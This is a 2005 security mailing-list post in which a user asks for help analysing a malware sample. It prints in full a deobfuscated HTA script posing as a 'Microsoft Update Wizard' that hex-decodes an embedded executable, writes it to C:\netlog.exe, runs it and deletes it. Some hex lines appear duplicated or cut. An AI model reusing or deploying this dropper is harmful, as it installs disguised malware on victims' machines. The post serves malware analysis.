[Dshield] Help Needed With Dissection of Exploit

Nemo Omen nemoaus at hotmail.com
Thu Aug 11 01:06:12 GMT 2005


Many thanks to everyone who has helped me to take apart this piece of 
malware. Its been a good learning experience for me. I've used the 
output.write method and iterated through the layers of obfuscation. The 
ppp.hta file was another script which produced the script below. Clearly 
this is builidng up a binary string using a similar decoding to what they 
used before. Can anyone tell me which exploit is being used with all the 
msmedia manipulation?

My other question is why did they bother with a multistage obfuscated 
loader? Why didn't they just put the script below into the passwords.html 
file to start with?

Next I will look at netlog.exe with IdaPro and see if I can work out a bit 
of what it is doing? At least netlog.exe is nice and small.

Also is there any precautions I should take when posting these html listings 
of bugs to this list?

Cheers.   Nem


<HTML><HEAD><TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" 
classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" 
classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><SCRIPT language="VBScript">
y=""
y=y+(J("...STOPITDECODING...4D5A00000000000000000000504500004C010200555058210000000000000000E0000F010B01000000120000000000000000000054010000001000000C0000000000141300100000000200"))

y=y+(J("000400000000000000040000000000000000500000000200000000000002000000000010000010000000001000001000000000000010000000000000000000000060480000840000000000"))

y=y+(J("000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"))

y=y+(J("0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000001000000000000000000000000000000000000000000000E00000C0"))

y=y+(J("00000000000000000010000000400000E108000000020000000000000000000000000000E00000C08725A4481413619455A4B680FF1373F933C9FF13731633C0FF13731FB68041B010FF13"))

y=y+(J("12C073FA753AAAEBE0FF530802F683D901750EFF5304EB24ACD1E8742D13C9EB189148C1E008ACFF53043B43F8730A80FC05730683F87F77024141958BC5B600568BF72BF0F3A45EEB9F5E"))

y=y+(J("AD97AD50FF5310958B074078F37503FF630C5055FF5314ABEBEE33C941FF1313C9FF1372F8C302D275058A164612D2C34B45524E454C33322E646C6C00009D0C1F1413AB09BD89CD12D524"))

y=y+(J("E148ED880320111B22374447FFC3027F352137102B09789117220F4405EBCC41F309FBA62853CF0822AD649D098D48719165297F1C9995716B9109816E216A4908477F806E746572E9CFAB"))

y=y+(J("471F06436F3312631F1E64539B610C86021C77696EB0372E646CE3C06F70F3F770271F3A730AFD7F1E20222539F93C49660F4578692A740EBD9E676F797AA51EB681613D5C638C76686F48"))

y=y+(J("2E28657853C32066696CDFD662C2CC1925CC6D7570705C7772286F781C386874FF383A2FD00F2E1D6E616DFDBC64BC775505193E0F01E801A7841877022E61077364666768736F72AFF531"))

y=y+(J("6B81E4248038847918616E64EE2E724975038770682D361B84AC0AD409C665043274FA080C31E441C410069120610CD208072F69762C08657F734866287FFA68FD8E1261702E6CEE63D92A"))

y=y+(J("6F32311D26559B625CFA6B845857C44E59CA445330667567726C799D92EBC4D30948E26487E96EE750CD50B3923E52E17175991074124EFBAB7732AC6B4E638C18504F624B896172689567"))

y=y+(J("3A4C20AE483C6DC46E87514861768C2068EDA42EBC2068F7314224C1209039D0BE97CC25792600D0E0E7E1EBEEEAE874F07AE238F2FC18CEEF10E5F9E4ED75E83A20F1727BF258EC4D3FE1"))

y=y+(J("07E7EEEFE0E7ED5C1EE8FB5DACC3066FF0E5F8E8643A20FD16EEEC0F76EFDF338CE63D71FE9BE2FB88E796FF37EDF5E1F33990E4B0E974E2E8FF9020196E5669EC54314002BB4D8E95F496"))

y=y+(J("7D80D1EA1CF0FBF298E981EEF638E5F1F837E7E0143DB0078CD5F21B8108B796EE3863E4F5F3EF1958CECA09E14288E28E779E1EF443F0ECE0F60AE3E4EBFF8647E32F4AEA8B32F8ED8F86"))

y=y+(J("AAE0F045C21A8E422ACA15362634DB42D4DD292201D8E8E7EEA5B0EB0CE6FC59D17EEE36E4E0AFFD55E2CA155431205965DA8F4C120C7E6D0462FB22CD8E6E8A770CBAFBF5E178DF371269"))

y=y+(J("3CE749C37573ED22207041B467CEC1AB2EC150BB4C6E203243F5446C6731915C09538BD8240C005633F685DB7E3257F87CF8101BE8BA082CC8C8B8D33E4D6203F7E9C1FA07E3C2A8E81F03"))

y=y+(J("3BD080806188143E463BF3067CDDC6041F4407C75F5E5BC366447AEF9C1E18321690900151561768B01046B715080D008BF085F6750532C0065E59C368942164562E044585C03015538D4C"))

y=y+(J("1C24086A0651FFD0263F0F958684DB740747E1138AEB5B404054E84AAB0C0284621D0C568B350C3368E827A09FFFD62AE894171874F03390C204E1B40C0B308081EC0C6303428D8429B002"))
2AE894171874F03390C204E1B40C0B308081EC0C6303428D8429B002"))

y=y+(J("DD0C1D1C69550B56576804A03950FFD3BFF011C72083C99C628D1894241847F2AE0AF7D12BF91F9E8BB93AE936FA3B28F6CD3E4FC10C02F3A5108DA0E214831FE1035018A47BF410851254"))

y=y+(J("11293AA2D91447CB78A98418A1393D20E583D8F4468D8C9ED02B401B515226E48D0E8A3A747268343A463250513245101CA26860F01952E83B07C499C40886535553104734504658329668"))

y=y+(J("C4C74B56E858B20C04A52B181A29B601025068BCA13F841558080EE8DC061B2F148D200209295120EAD9025D5B81C4444748C3508818A841C46B71FE847325A7654C09891111E7201537C6"))

y=y+(J("2051E8B0FDD442A622708AA92EE3942E145250676C65C8128206DBD638421099351C5681469034841CF0ACDF1159280BE8F90659C518E2C65180150DCD01ECA4114CC5478B46DED244CD84"))

y=y+(J("AA661EED864E2220114303290871B19C20111D07FBBA4E43F905855B11E38C8C1552AD4890A484BB053682FD0A40026848180CC87C858B3D84769104A3AC4336CD48D526D7F48223558B2D"))

y=y+(J("67C315D53DD122C174E55D50928C8063A33951D58A5480A5F3542D84CD88C7FC6E1D81DCF60A53457091A4645006689175860C6A012EEB081D4474687944A6C167D3B72AD740DA98CC74D5"))

y=y+(J("1D8BF8854A74187D9501EC2857E38B0CDC6411CE37BA708D08F4125FA43DA60B20372E8BD884050F843A96D81C5053C76C8868C8A64657537DF410A72AF69221F1FE212ED0E9D4CB3B90BA"))

y=y+(J("3097601D84217E7A588C869C405E57AEB7742C8C455714D64FB701E22068902453500C239128FC852AA045FB918760664B0D628CAE866D49FC5FA328E42FDE15E837AF5696C4745D8E9239"))

y=y+(J("B4C6FD1A2A91E0C88CD17CF617EBA44A52CE3F115BFEA3B49C7AC812F421F5FD4ED2C26368124C29904291224268DC6C1CFA749C08C98CDD1C56AE9874A48C4256D2292093BCD32D20BC19"))

y=y+(J("299C2A4A1893A22D1728CB13EB9462C0142B85F4F9913915289FBD503B692504AD04A2ACD28A7E334C25EC0EA751E8FE1736C9AB245C57449518170852E8E7A09394CA044733C0B6E14019"))

y=y+(J("8B72C1F8BFB11C2519DCC82CD5776EA49D3992B5168346282EC6B40AE8A35B90181F75A66C5162E88BA512048247242897890850184F9018ACDD916F6C29F04219D8AA0452A814301C85B2"))

0CB10119C2115812DE2430443C21088C915E227C45A40E3B14381F4F"))

y=y+(J("A894A51464842F4301BA83467265884C6962EC61F079D21DB11079901C41647FDF267C027E4C7D61A620504110536B6C60E892436FEC794A46C4D51D1580737472636D70D04042824D6F64"))

y=y+(J("F884811D4E2B11CF1697985B44EF9FB4637CD34E0945787050EFEDCD769E2C6F3758B374536194506773417CD0A15468940F6444DF4669636BF26C754E1C4B1C45524EC44C3332B8A79B03"))

y=y+(J("31B47075746608536868D26F48E26D15090E161CCAFC4DAADCF0A0FF5A1E418C08207451469ED567CFAA75B319815553A1DA6A4CBC65DA125AF8CE6F7487CA48862187CA27146EACC16578"))

y=y+(J("6974400866636C3E6F73D50A199F040AB955943590B5400A5FCD1775400914A00730F5504B4D5356154352547A8F55644C44B8146AA6111E54247DE37572FA6D423B32225CD8E5430D7748"))

y=y+(J("85A14816664FF36D55606C1B14672257F64E045745694701AEBBD800000000B84800000000000000000000F2010000B8480000000000000000000000000000000000000000000000101413"))

y=y+(J("004014137C1E141300000000A848141380000000007D000088481413E8011413DC011413DE011413B01C1413C2480000D0480000000000004C6F61644C6962726172794100004765745072"))

y=y+(J("6F63416464726573730000"))

FN = "C:\netlog.exe"
Set IESetup = MSmedia.CreateTextFile(FN, True)
IESetup.Write (y)
IESetup.Close()
MSplay.Run (FN), 1, True
MSmedia.DeleteFile (FN)
self.Close
MSplay.Run (FN), 1, True
MSmedia.DeleteFile (FN)
Function J(J1)
Dim J2
Dim J3: J2 = ""
For J3 = 1 To Len(J1) Step 2
J2=J2&Chr("&h"&Mid(J1,J3,2))
Next
J = J2
End Function
</SCRIPT></BODY></HTML>

_________________________________________________________________
Low rate ANZ MasterCard. Apply now! 
http://clk.atdmt.com/MAU/go/msnnkanz0030000006mau/direct/01/  Must be over 
18 years.



More information about the list mailing list